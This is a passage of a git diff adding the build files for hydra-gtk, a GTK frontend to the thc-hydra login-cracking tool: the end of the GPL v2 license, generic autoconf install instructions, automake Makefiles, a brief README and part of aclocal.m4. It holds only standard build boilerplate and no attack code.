Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Library General +Public License instead of this License. diff --git a/hydra-gtk/ChangeLog b/hydra-gtk/ChangeLog new file mode 100755 index 0000000..e69de29 diff --git a/hydra-gtk/INSTALL b/hydra-gtk/INSTALL new file mode 100755 index 0000000..b42a17a --- /dev/null +++ b/hydra-gtk/INSTALL @@ -0,0 +1,182 @@ +Basic Installation +================== + + These are generic installation instructions. + + The `configure' shell script attempts to guess correct values for +various system-dependent variables used during compilation. It uses +those values to create a `Makefile' in each directory of the package. +It may also create one or more `.h' files containing system-dependent +definitions. Finally, it creates a shell script `config.status' that +you can run in the future to recreate the current configuration, a file +`config.cache' that saves the results of its tests to speed up +reconfiguring, and a file `config.log' containing compiler output +(useful mainly for debugging `configure'). + + If you need to do unusual things to compile the package, please try +to figure out how `configure' could check whether to do them, and mail +diffs or instructions to the address given in the `README' so they can +be considered for the next release. If at some point `config.cache' +contains results you don't want to keep, you may remove or edit it. + + The file `configure.in' is used to create `configure' by a program +called `autoconf'. You only need `configure.in' if you want to change +it or regenerate `configure' using a newer version of `autoconf'. + +The simplest way to compile this package is: + + 1. `cd' to the directory containing the package's source code and type + `./configure' to configure the package for your system. If you're + using `csh' on an old version of System V, you might need to type + `sh ./configure' instead to prevent `csh' from trying to execute + `configure' itself. + + Running `configure' takes awhile. While running, it prints some + messages telling which features it is checking for. + + 2. Type `make' to compile the package. + + 3. Optionally, type `make check' to run any self-tests that come with + the package. + + 4. Type `make install' to install the programs and any data files and + documentation. + + 5. You can remove the program binaries and object files from the + source code directory by typing `make clean'. To also remove the + files that `configure' created (so you can compile the package for + a different kind of computer), type `make distclean'. There is + also a `make maintainer-clean' target, but that is intended mainly + for the package's developers. If you use it, you may have to get + all sorts of other programs in order to regenerate files that came + with the distribution. + +Compilers and Options +===================== + + Some systems require unusual options for compilation or linking that +the `configure' script does not know about. You can give `configure' +initial values for variables by setting them in the environment. Using +a Bourne-compatible shell, you can do that on the command line like +this: + CC=c89 CFLAGS=-O2 LIBS=-lposix ./configure + +Or on systems that have the `env' program, you can do it like this: + env CPPFLAGS=-I/usr/local/include LDFLAGS=-s ./configure + +Compiling For Multiple Architectures +==================================== + + You can compile the package for more than one kind of computer at the +same time, by placing the object files for each architecture in their +own directory. To do this, you must use a version of `make' that +supports the `VPATH' variable, such as GNU `make'. `cd' to the +directory where you want the object files and executables to go and run +the `configure' script. `configure' automatically checks for the +source code in the directory that `configure' is in and in `..'. + + If you have to use a `make' that does not supports the `VPATH' +variable, you have to compile the package for one architecture at a time +in the source code directory. After you have installed the package for +one architecture, use `make distclean' before reconfiguring for another +architecture. + +Installation Names +================== + + By default, `make install' will install the package's files in +`/usr/local/bin', `/usr/local/man', etc. You can specify an +installation prefix other than `/usr/local' by giving `configure' the +option `--prefix=PATH'. + + You can specify separate installation prefixes for +architecture-specific files and architecture-independent files. If you +give `configure' the option `--exec-prefix=PATH', the package will use +PATH as the prefix for installing programs and libraries. +Documentation and other data files will still use the regular prefix. + + In addition, if you use an unusual directory layout you can give +options like `--bindir=PATH' to specify different values for particular +kinds of files. Run `configure --help' for a list of the directories +you can set and what kinds of files go in them. + + If the package supports it, you can cause programs to be installed +with an extra prefix or suffix on their names by giving `configure' the +option `--program-prefix=PREFIX' or `--program-suffix=SUFFIX'. + +Optional Features +================= + + Some packages pay attention to `--enable-FEATURE' options to +`configure', where FEATURE indicates an optional part of the package. +They may also pay attention to `--with-PACKAGE' options, where PACKAGE +is something like `gnu-as' or `x' (for the X Window System). The +`README' should mention any `--enable-' and `--with-' options that the +package recognizes. + + For packages that use the X Window System, `configure' can usually +find the X include and library files automatically, but if it doesn't, +you can use the `configure' options `--x-includes=DIR' and +`--x-libraries=DIR' to specify their locations. + +Specifying the System Type +========================== + + There may be some features `configure' can not figure out +automatically, but needs to determine by the type of host the package +will run on. Usually `configure' can figure that out, but if it prints +a message saying it can not guess the host type, give it the +`--host=TYPE' option. TYPE can either be a short name for the system +type, such as `sun4', or a canonical name with three fields: + CPU-COMPANY-SYSTEM + +See the file `config.sub' for the possible values of each field. If +`config.sub' isn't included in this package, then this package doesn't +need to know the host type. + + If you are building compiler tools for cross-compiling, you can also +use the `--target=TYPE' option to select the type of system they will +produce code for and the `--build=TYPE' option to select the type of +system on which you are compiling the package. + +Sharing Defaults +================ + + If you want to set default values for `configure' scripts to share, +you can create a site shell script called `config.site' that gives +default values for variables like `CC', `cache_file', and `prefix'. +`configure' looks for `PREFIX/share/config.site' if it exists, then +`PREFIX/etc/config.site' if it exists. Or, you can set the +`CONFIG_SITE' environment variable to the location of the site script. +A warning: not all `configure' scripts look for a site script. + +Operation Controls +================== + + `configure' recognizes the following options to control how it +operates. + +`--cache-file=FILE' + Use and save the results of the tests in FILE instead of + `./config.cache'. Set FILE to `/dev/null' to disable caching, for + debugging `configure'. + +`--help' + Print a summary of the options to `configure', and exit. + +`--quiet' +`--silent' +`-q' + Do not print messages saying which checks are being made. To + suppress all normal output, redirect it to `/dev/null' (any error + messages will still be shown). + +`--srcdir=DIR' + Look for the package's source code in directory DIR. Usually + `configure' can determine that directory automatically. + +`--version' + Print the version of Autoconf used to generate the `configure' + script, and exit. + +`configure' also accepts some other, not widely useful, options. diff --git a/hydra-gtk/Makefile.am b/hydra-gtk/Makefile.am new file mode 100755 index 0000000..8e792ca --- /dev/null +++ b/hydra-gtk/Makefile.am @@ -0,0 +1,30 @@ +## Process this file with automake to produce Makefile.in + +SUBDIRS = src + +EXTRA_DIST = \ + autogen.sh \ + xhydra.glade \ + xhydra.gladep + +install-data-local: + @$(NORMAL_INSTALL) + if test -d $(srcdir)/pixmaps; then \ + $(mkinstalldirs) $(DESTDIR)$(pkgdatadir)/pixmaps; \ + for pixmap in $(srcdir)/pixmaps/*; do \ + if test -f $$pixmap; then \ + $(INSTALL_DATA) $$pixmap $(DESTDIR)$(pkgdatadir)/pixmaps; \ + fi \ + done \ + fi + +dist-hook: + if test -d pixmaps; then \ + mkdir $(distdir)/pixmaps; \ + for pixmap in pixmaps/*; do \ + if test -f $$pixmap; then \ + cp -p $$pixmap $(distdir)/pixmaps; \ + fi \ + done \ + fi + diff --git a/hydra-gtk/Makefile.in b/hydra-gtk/Makefile.in new file mode 100755 index 0000000..bf5322e --- /dev/null +++ b/hydra-gtk/Makefile.in @@ -0,0 +1,382 @@ +# Makefile.in generated automatically by automake 1.4-p6 from Makefile.am + +# Copyright (C) 1994, 1995-8, 1999, 2001 Free Software Foundation, Inc. +# This Makefile.in is free software; the Free Software Foundation +# gives unlimited permission to copy and/or distribute it, +# with or without modifications, as long as this notice is preserved. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY, to the extent permitted by law; without +# even the implied warranty of MERCHANTABILITY or FITNESS FOR A +# PARTICULAR PURPOSE. + + +SHELL = @SHELL@ + +srcdir = @srcdir@ +top_srcdir = @top_srcdir@ +VPATH = @srcdir@ +prefix = @prefix@ +exec_prefix = @exec_prefix@ + +bindir = @bindir@ +sbindir = @sbindir@ +libexecdir = @libexecdir@ +datadir = @datadir@ +sysconfdir = @sysconfdir@ +sharedstatedir = @sharedstatedir@ +localstatedir = @localstatedir@ +libdir = @libdir@ +infodir = @infodir@ +mandir = @mandir@ +includedir = @includedir@ +oldincludedir = /usr/include + +DESTDIR = + +pkgdatadir = $(datadir)/@PACKAGE@ +pkglibdir = $(libdir)/@PACKAGE@ +pkgincludedir = $(includedir)/@PACKAGE@ + +top_builddir = . + +ACLOCAL = @ACLOCAL@ +AUTOCONF = @AUTOCONF@ +AUTOMAKE = @AUTOMAKE@ +AUTOHEADER = @AUTOHEADER@ + +INSTALL = @INSTALL@ +INSTALL_PROGRAM = @INSTALL_PROGRAM@ $(AM_INSTALL_PROGRAM_FLAGS) +INSTALL_DATA = @INSTALL_DATA@ +INSTALL_SCRIPT = @INSTALL_SCRIPT@ +transform = @program_transform_name@ + +NORMAL_INSTALL = : +PRE_INSTALL = : +POST_INSTALL = : +NORMAL_UNINSTALL = : +PRE_UNINSTALL = : +POST_UNINSTALL = : +CC = @CC@ +MAINT = @MAINT@ +MAKEINFO = @MAKEINFO@ +PACKAGE = @PACKAGE@ +PACKAGE_CFLAGS = @PACKAGE_CFLAGS@ +PACKAGE_LIBS = @PACKAGE_LIBS@ +PKG_CONFIG = @PKG_CONFIG@ +VERSION = @VERSION@ + +SUBDIRS = src + +EXTRA_DIST = autogen.sh xhydra.glade xhydra.gladep + +ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 +mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs +CONFIG_HEADER = config.h +CONFIG_CLEAN_FILES = +DIST_COMMON = README ./stamp-h.in AUTHORS COPYING ChangeLog INSTALL \ +Makefile.am Makefile.in NEWS acconfig.h aclocal.m4 config.h.in \ +configure configure.in install-sh missing mkinstalldirs + + +DISTFILES = $(DIST_COMMON) $(SOURCES) $(HEADERS) $(TEXINFOS) $(EXTRA_DIST) + +TAR = tar +GZIP_ENV = --best +all: all-redirect +.SUFFIXES: +$(srcdir)/Makefile.in: @MAINTAINER_MODE_TRUE@ Makefile.am $(top_srcdir)/configure.in $(ACLOCAL_M4) + cd $(top_srcdir) && $(AUTOMAKE) --gnu Makefile + +Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status $(BUILT_SOURCES) + cd $(top_builddir) \ + && CONFIG_FILES=$@ CONFIG_HEADERS= $(SHELL) ./config.status + +$(ACLOCAL_M4): @MAINTAINER_MODE_TRUE@ configure.in + cd $(srcdir) && $(ACLOCAL) + +config.status: $(srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES) + $(SHELL) ./config.status --recheck +$(srcdir)/configure: @MAINTAINER_MODE_TRUE@$(srcdir)/configure.in $(ACLOCAL_M4) $(CONFIGURE_DEPENDENCIES) + cd $(srcdir) && $(AUTOCONF) + +config.h: stamp-h + @if test ! -f $@; then \ + rm -f stamp-h; \ + $(MAKE) stamp-h; \ + else :; fi +stamp-h: $(srcdir)/config.h.in $(top_builddir)/config.status + cd $(top_builddir) \ + && CONFIG_FILES= CONFIG_HEADERS=config.h \ + $(SHELL) ./config.status + @echo timestamp > stamp-h 2> /dev/null +$(srcdir)/config.h.in: @MAINTAINER_MODE_TRUE@$(srcdir)/stamp-h.in + @if test ! -f $@; then \ + rm -f $(srcdir)/stamp-h.in; \ + $(MAKE) $(srcdir)/stamp-h.in; \ + else :; fi +$(srcdir)/stamp-h.in: $(top_srcdir)/configure.in $(ACLOCAL_M4) acconfig.h + cd $(top_srcdir) && $(AUTOHEADER) + @echo timestamp > $(srcdir)/stamp-h.in 2> /dev/null + +mostlyclean-hdr: + +clean-hdr: + +distclean-hdr: + -rm -f config.h + +maintainer-clean-hdr: + +# This directory's subdirectories are mostly independent; you can cd +# into them and run `make' without going through this Makefile. +# To change the values of `make' variables: instead of editing Makefiles, +# (1) if the variable is set in `config.status', edit `config.status' +# (which will cause the Makefiles to be regenerated when you run `make'); +# (2) otherwise, pass the desired values on the `make' command line. + +@SET_MAKE@ + +all-recursive install-data-recursive install-exec-recursive \ +installdirs-recursive install-recursive uninstall-recursive \ +check-recursive installcheck-recursive info-recursive dvi-recursive: + @set fnord $(MAKEFLAGS); amf=$$2; \ + dot_seen=no; \ + target=`echo $@ | sed s/-recursive//`; \ + list='$(SUBDIRS)'; for subdir in $$list; do \ + echo "Making $$target in $$subdir"; \ + if test "$$subdir" = "."; then \ + dot_seen=yes; \ + local_target="$$target-am"; \ + else \ + local_target="$$target"; \ + fi; \ + (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \ + || case "$$amf" in *=*) exit 1;; *k*) fail=yes;; *) exit 1;; esac; \ + done; \ + if test "$$dot_seen" = "no"; then \ + $(MAKE) $(AM_MAKEFLAGS) "$$target-am" || exit 1; \ + fi; test -z "$$fail" + +mostlyclean-recursive clean-recursive distclean-recursive \ +maintainer-clean-recursive: + @set fnord $(MAKEFLAGS); amf=$$2; \ + dot_seen=no; \ + rev=''; list='$(SUBDIRS)'; for subdir in $$list; do \ + rev="$$subdir $$rev"; \ + test "$$subdir" != "." || dot_seen=yes; \ + done; \ + test "$$dot_seen" = "no" && rev=". $$rev"; \ + target=`echo $@ | sed s/-recursive//`; \ + for subdir in $$rev; do \ + echo "Making $$target in $$subdir"; \ + if test "$$subdir" = "."; then \ + local_target="$$target-am"; \ + else \ + local_target="$$target"; \ + fi; \ + (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \ + || case "$$amf" in *=*) exit 1;; *k*) fail=yes;; *) exit 1;; esac; \ + done && test -z "$$fail" +tags-recursive: + list='$(SUBDIRS)'; for subdir in $$list; do \ + test "$$subdir" = . || (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) tags); \ + done + +tags: TAGS + +ID: $(HEADERS) $(SOURCES) $(LISP) + list='$(SOURCES) $(HEADERS)'; \ + unique=`for i in $$list; do echo $$i; done | \ + awk ' { files[$$0] = 1; } \ + END { for (i in files) print i; }'`; \ + here=`pwd` && cd $(srcdir) \ + && mkid -f$$here/ID $$unique $(LISP) + +TAGS: tags-recursive $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) $(LISP) + tags=; \ + here=`pwd`; \ + list='$(SUBDIRS)'; for subdir in $$list; do \ + if test "$$subdir" = .; then :; else \ + test -f $$subdir/TAGS && tags="$$tags -i $$here/$$subdir/TAGS"; \ + fi; \ + done; \ + list='$(SOURCES) $(HEADERS)'; \ + unique=`for i in $$list; do echo $$i; done | \ + awk ' { files[$$0] = 1; } \ + END { for (i in files) print i; }'`; \ + test -z "$(ETAGS_ARGS)config.h.in$$unique$(LISP)$$tags" \ + || (cd $(srcdir) && etags $(ETAGS_ARGS) $$tags config.h.in $$unique $(LISP) -o $$here/TAGS) + +mostlyclean-tags: + +clean-tags: + +distclean-tags: + -rm -f TAGS ID + +maintainer-clean-tags: + +distdir = $(PACKAGE)-$(VERSION) +top_distdir = $(distdir) + +# This target untars the dist file and tries a VPATH configuration. Then +# it guarantees that the distribution is self-contained by making another +# tarfile. +distcheck: dist + -rm -rf $(distdir) + GZIP=$(GZIP_ENV) $(TAR) zxf $(distdir).tar.gz + mkdir $(distdir)/=build + mkdir $(distdir)/=inst + dc_install_base=`cd $(distdir)/=inst && pwd`; \ + cd $(distdir)/=build \ + && ../configure --srcdir=.. --prefix=$$dc_install_base \ + && $(MAKE) $(AM_MAKEFLAGS) \ + && $(MAKE) $(AM_MAKEFLAGS) dvi \ + && $(MAKE) $(AM_MAKEFLAGS) check \ + && $(MAKE) $(AM_MAKEFLAGS) install \ + && $(MAKE) $(AM_MAKEFLAGS) installcheck \ + && $(MAKE) $(AM_MAKEFLAGS) dist + -rm -rf $(distdir) + @banner="$(distdir).tar.gz is ready for distribution"; \ + dashes=`echo "$$banner" | sed s/./=/g`; \ + echo "$$dashes"; \ + echo "$$banner"; \ + echo "$$dashes" +dist: distdir + -chmod -R a+r $(distdir) + GZIP=$(GZIP_ENV) $(TAR) chozf $(distdir).tar.gz $(distdir) + -rm -rf $(distdir) +dist-all: distdir + -chmod -R a+r $(distdir) + GZIP=$(GZIP_ENV) $(TAR) chozf $(distdir).tar.gz $(distdir) + -rm -rf $(distdir) +distdir: $(DISTFILES) + -rm -rf $(distdir) + mkdir $(distdir) + -chmod 777 $(distdir) + here=`cd $(top_builddir) && pwd`; \ + top_distdir=`cd $(distdir) && pwd`; \ + distdir=`cd $(distdir) && pwd`; \ + cd $(top_srcdir) \ + && $(AUTOMAKE) --include-deps --build-dir=$$here --srcdir-name=$(top_srcdir) --output-dir=$$top_distdir --gnu Makefile + @for file in $(DISTFILES); do \ + d=$(srcdir); \ + if test -d $$d/$$file; then \ + cp -pr $$d/$$file $(distdir)/$$file; \ + else \ + test -f $(distdir)/$$file \ + || ln $$d/$$file $(distdir)/$$file 2> /dev/null \ + || cp -p $$d/$$file $(distdir)/$$file || :; \ + fi; \ + done + for subdir in $(SUBDIRS); do \ + if test "$$subdir" = .; then :; else \ + test -d $(distdir)/$$subdir \ + || mkdir $(distdir)/$$subdir \ + || exit 1; \ + chmod 777 $(distdir)/$$subdir; \ + (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) top_distdir=../$(distdir) distdir=../$(distdir)/$$subdir distdir) \ + || exit 1; \ + fi; \ + done + $(MAKE) $(AM_MAKEFLAGS) top_distdir="$(top_distdir)" distdir="$(distdir)" dist-hook +info-am: +info: info-recursive +dvi-am: +dvi: dvi-recursive +check-am: all-am +check: check-recursive +installcheck-am: +installcheck: installcheck-recursive +all-recursive-am: config.h + $(MAKE) $(AM_MAKEFLAGS) all-recursive + +install-exec-am: +install-exec: install-exec-recursive + +install-data-am: install-data-local +install-data: install-data-recursive + +install-am: all-am + @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am +install: install-recursive +uninstall-am: +uninstall: uninstall-recursive +all-am: Makefile config.h +all-redirect: all-recursive-am +install-strip: + $(MAKE) $(AM_MAKEFLAGS) AM_INSTALL_PROGRAM_FLAGS=-s install +installdirs: installdirs-recursive +installdirs-am: + + +mostlyclean-generic: + +clean-generic: + +distclean-generic: + -rm -f Makefile $(CONFIG_CLEAN_FILES) + -rm -f config.cache config.log stamp-h stamp-h[0-9]* + +maintainer-clean-generic: +mostlyclean-am: mostlyclean-hdr mostlyclean-tags mostlyclean-generic + +mostlyclean: mostlyclean-recursive + +clean-am: clean-hdr clean-tags clean-generic mostlyclean-am + +clean: clean-recursive + +distclean-am: distclean-hdr distclean-tags distclean-generic clean-am + +distclean: distclean-recursive + -rm -f config.status + +maintainer-clean-am: maintainer-clean-hdr maintainer-clean-tags \ + maintainer-clean-generic distclean-am + @echo "This command is intended for maintainers to use;" + @echo "it deletes files that may require special tools to rebuild." + +maintainer-clean: maintainer-clean-recursive + -rm -f config.status + +.PHONY: mostlyclean-hdr distclean-hdr clean-hdr maintainer-clean-hdr \ +install-data-recursive uninstall-data-recursive install-exec-recursive \ +uninstall-exec-recursive installdirs-recursive uninstalldirs-recursive \ +all-recursive check-recursive installcheck-recursive info-recursive \ +dvi-recursive mostlyclean-recursive distclean-recursive clean-recursive \ +maintainer-clean-recursive tags tags-recursive mostlyclean-tags \ +distclean-tags clean-tags maintainer-clean-tags distdir info-am info \ +dvi-am dvi check check-am installcheck-am installcheck all-recursive-am \ +install-exec-am install-exec install-data-local install-data-am \ +install-data install-am install uninstall-am uninstall all-redirect \ +all-am all installdirs-am installdirs mostlyclean-generic \ +distclean-generic clean-generic maintainer-clean-generic clean \ +mostlyclean distclean maintainer-clean + + +install-data-local: + @$(NORMAL_INSTALL) + if test -d $(srcdir)/pixmaps; then \ + $(mkinstalldirs) $(DESTDIR)$(pkgdatadir)/pixmaps; \ + for pixmap in $(srcdir)/pixmaps/*; do \ + if test -f $$pixmap; then \ + $(INSTALL_DATA) $$pixmap $(DESTDIR)$(pkgdatadir)/pixmaps; \ + fi \ + done \ + fi + +dist-hook: + if test -d pixmaps; then \ + mkdir $(distdir)/pixmaps; \ + for pixmap in pixmaps/*; do \ + if test -f $$pixmap; then \ + cp -p $$pixmap $(distdir)/pixmaps; \ + fi \ + done \ + fi + +# Tell versions [3.59,3.63) of GNU make to not export all variables. +# Otherwise a system limit (for SysV at least) may be exceeded. +.NOEXPORT: diff --git a/hydra-gtk/NEWS b/hydra-gtk/NEWS new file mode 100755 index 0000000..e69de29 diff --git a/hydra-gtk/README b/hydra-gtk/README new file mode 100755 index 0000000..07f3833 --- /dev/null +++ b/hydra-gtk/README @@ -0,0 +1,19 @@ + +Hydra-GTK + +Gtk+2 frontend for thc-hydra + + + +To install just do a: + +./configure + make + su root + make install + +Easy at it can be... You need thc-hydra installed to make this work. +This is my second gtk+2 program, so I am waiting for a lot of patches :) +Mail them to snakebyte@gmx.de + + diff --git a/hydra-gtk/acconfig.h b/hydra-gtk/acconfig.h new file mode 100755 index 0000000..0a76fa0 --- /dev/null +++ b/hydra-gtk/acconfig.h @@ -0,0 +1,7 @@ +#undef ENABLE_NLS +#undef HAVE_CATGETS +#undef HAVE_GETTEXT +#undef GETTEXT_PACKAGE +#undef HAVE_LC_MESSAGES +#undef HAVE_STPCPY +#undef HAVE_LIBSM diff --git a/hydra-gtk/aclocal.m4 b/hydra-gtk/aclocal.m4 new file mode 100755 index 0000000..14a337a --- /dev/null +++ b/hydra-gtk/aclocal.m4 @@ -0,0 +1,363 @@ +dnl aclocal.m4 generated automatically by aclocal 1.4-p6 + +dnl Copyright (C) 1994, 1995-8, 1999, 2001 Free Software Foundation, Inc. +dnl This file is free software; the Free Software Foundation +dnl gives unlimited permission to copy and/or distribute it, +dnl with or without modifications, as long as this notice is preserved. + +dnl This program is distributed in the hope that it will be useful, +dnl but WITHOUT ANY WARRANTY, to the extent permitted by law; without +dnl even the implied warranty of MERCHANTABILITY or FITNESS FOR A +dnl PARTICULAR PURPOSE. + +# Do all the work for Automake. This macro actually does too much -- +# some checks are only needed if your package does certain things. +# But this isn't really a big deal. + +# serial 1 + +dnl Usage: +dnl AM_INIT_AUTOMAKE(package,version, [no-define]) + +AC_DEFUN([AM_INIT_AUTOMAKE], +[AC_REQUIRE([AM_SET_CURRENT_AUTOMAKE_VERSION])dnl +AC_REQUIRE([AC_PROG_INSTALL]) +PACKAGE=[$1] +AC_SUBST(PACKAGE) +VERSION=[$2] +AC_SUBST(VERSION) +dnl test to see if srcdir already configured +if test "`cd $srcdir && pwd`" != "`pwd`" && test -f $srcdir/config.status; then + AC_MSG_ERROR([source directory already configured; run "make distclean" there first]) +fi +ifelse([$3],, +AC_DEFINE_UNQUOTED(PACKAGE, "$PACKAGE", [Name of package]) +AC_DEFINE_UNQUOTED(VERSION, "$VERSION", [Version number of package])) +AC_REQUIRE([AM_SANITY_CHECK]) +AC_REQUIRE([AC_ARG_PROGRAM]) +dnl FIXME This is truly gross. +missing_dir=`cd $ac_aux_dir && pwd` +AM_MISSING_PROG(ACLOCAL, aclocal-${am__api_version}, $missing_dir) +AM_MISSING_PROG(AUTOCONF, autoconf, $missing_dir) +AM_MISSING_PROG(AUTOMAKE, automake-${am__api_version}, $missing_dir) +AM_MISSING_PROG(AUTOHEADER, autoheader, $missing_dir) +AM_MISSING_PROG(MAKEINFO, makeinfo, $missing_dir) +AC_REQUIRE([AC_PROG_MAKE_SET])]) + +# Copyright 2002 Free Software Foundation, Inc. + +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2, or (at your option) +# any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. + +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + +# AM_AUTOMAKE_VERSION(VERSION) +# ---------------------------- +# Automake X.Y traces this macro to ensure aclocal.m4 has been +# generated from the m4 files accompanying Automake X.Y. +AC_DEFUN([AM_AUTOMAKE_VERSION],[am__api_version="1.4"]) + +# AM_SET_CURRENT_AUTOMAKE_VERSION +# ------------------------------- +# Call AM_AUTOMAKE_VERSION so it can be traced. +# This function is AC_REQUIREd by AC_INIT_AUTOMAKE. +AC_DEFUN([AM_SET_CURRENT_AUTOMAKE_VERSION], + [AM_AUTOMAKE_VERSION([1.4-p6])]) + +# +# Check to make sure that the build environment is sane. +# + +AC_DEFUN([AM_SANITY_CHECK], +[AC_MSG_CHECKING([whether build environment is sane]) +# Just in case +sleep 1 +echo timestamp > conftestfile +# Do `set' in a subshell so we don't clobber the current shell's +# arguments. Must try -L first in case configure is actually a +# symlink; some systems play weird games with the mod time of symlinks +# (eg FreeBSD returns the mod time of the symlink's containing +# directory). +if ( + set X `ls -Lt $srcdir/configure conftestfile 2> /dev/null` + if test "[$]*" = "X"; then + # -L didn't work. + set X `ls -t $srcdir/configure conftestfile` + fi + if test "[$]*" != "X $srcdir/configure conftestfile" \ + && test "[$]*" != "X conftestfile $srcdir/configure"; then + + # If neither matched, then we have a broken ls. This can happen + # if, for instance, CONFIG_SHELL is bash and it inherits a + # broken ls alias from the environment. This has actually + # happened. Such a system could not be considered "sane". + AC_MSG_ERROR([ls -t appears to fail. Make sure there is not a broken +alias in your environment]) + fi + + test "[$]2" = conftestfile + ) +then + # Ok. + : +else + AC_MSG_ERROR([newly created file is older than distributed files! +Check your system clock]) +fi +rm -f conftest* +AC_MSG_RESULT(yes)]) + +dnl AM_MISSING_PROG(NAME, PROGRAM, DIRECTORY) +dnl The program must properly implement --version. +AC_DEFUN([AM_MISSING_PROG], +[AC_MSG_CHECKING(for working $2) +# Run test in a subshell; some versions of sh will print an error if +# an executable is not found, even if stderr is redirected. +# Redirect stdin to placate older versions of autoconf. Sigh. +if ($2 --version) < /dev/null > /dev/null 2>&1; then + $1=$2 + AC_MSG_RESULT(found) +else + $1="$3/missing $2" + AC_MSG_RESULT(missing) +fi +AC_SUBST($1)]) + +# Like AC_CONFIG_HEADER, but automatically create stamp file. + +AC_DEFUN([AM_CONFIG_HEADER], +[AC_PREREQ([2.12]) +AC_CONFIG_HEADER([$1]) +dnl When config.status generates a header, we must update the stamp-h file. +dnl This file resides in the same directory as the config header +dnl that is generated. We must strip everything past the first ":", +dnl and everything past the last "/". +AC_OUTPUT_COMMANDS(changequote(<<,>>)dnl +ifelse(patsubst(<<$1>>, <<[^ ]>>, <<>>), <<>>, +<>CONFIG_HEADERS" || echo timestamp > patsubst(<<$1>>, <<^\([^:]*/\)?.*>>, <<\1>>)stamp-h<<>>dnl>>, +<>; do + case " <<$>>CONFIG_HEADERS " in + *" <<$>>am_file "*<<)>> + echo timestamp > `echo <<$>>am_file | sed -e 's%:.*%%' -e 's%[^/]*$%%'`stamp-h$am_indx + ;; + esac + am_indx=`expr "<<$>>am_indx" + 1` +done<<>>dnl>>) +changequote([,]))]) + +# Add --enable-maintainer-mode option to configure. +# From Jim 